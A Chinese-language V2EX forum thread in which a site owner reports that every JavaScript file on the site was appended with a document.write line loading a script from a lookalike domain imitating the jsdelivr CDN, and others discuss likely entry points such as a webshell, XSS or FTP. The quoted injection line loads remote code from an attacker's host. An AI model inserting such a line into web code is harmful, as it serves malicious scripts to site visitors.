这是被挂了什么代码

2022-10-26 12:22:42 +08:00
 jalen
document.write(unescape("%3Cscript src='https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js'%3E%3C/script%3E"));

把加载的 js 最后全加了这个。

4139 次点击
所在节点    JavaScript
17 条回复
shuxhan
2022-10-26 12:28:19 +08:00
就是给网页添加了 jquery 库的引入标签,不过这样写的话,整个页面都废了全部被覆盖。
jalen
2022-10-26 12:32:26 +08:00
@shuxhan #1 我就是被挂了木马了。 文件被修改了
kenvix
2022-10-26 12:39:00 +08:00
打开 https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js 显然这不是正常的 jquery 而是假装 jq 的马
jalen
2022-10-26 12:43:50 +08:00
@kenvix #3 这种情况大概率是怎么植入的,我现在不知道怎么防
illl
2022-10-26 12:47:43 +08:00
被 getshell 了吧,网站用的啥框架
mxT52CRuqR6o5
2022-10-26 12:50:36 +08:00
那可能性可多了
edis0n0
2022-10-26 13:17:22 +08:00
@kenvix #3 这个伪装不太行,以前我见过的伪装 jq 的马空 referrer 的时候都能返回真 jq
wtfedc
2022-10-26 15:24:43 +08:00
@jalen 如果博客开了评论,检查下 xss 。不过所有页面都有加的话,估计 webshell 早拿到了
learningman
2022-10-26 16:06:54 +08:00
头一回见到 autos 这个顶级域
wingor2015
2022-10-26 16:51:11 +08:00
遇到过一次是服务器上的代码被加了
jalen
2022-10-26 20:24:48 +08:00
我看了自己的文件 就 js 被修改过,也没有新增文件。服务器也没被闯入的痕迹。 这攻击点会在哪里?
hxy100
2022-10-27 02:26:47 +08:00
这个域名也很有迷惑性,仿知名 CDN 的域名 jsdelivr.com
MEIerer
2022-10-27 09:31:03 +08:00
我好久没中过木马了,现在装东西看见内存小的都会往哈勃测一下
jalen
2022-10-27 09:49:42 +08:00
@MEIerer #13 哈勃?什么东西
Trient
2022-10-27 13:47:08 +08:00
@jalen https://habo.qq.com/tool/index
siwi
2022-11-12 17:35:01 +08:00
找到问题所在了吗? 我也是被挂了这个链接
jalen
2022-11-14 12:08:38 +08:00
@siwi 我不知道问题出在哪里, 反正就先删了 js 。 是不是 ftp 被干了,因为服务器没看到被破。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/889977

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX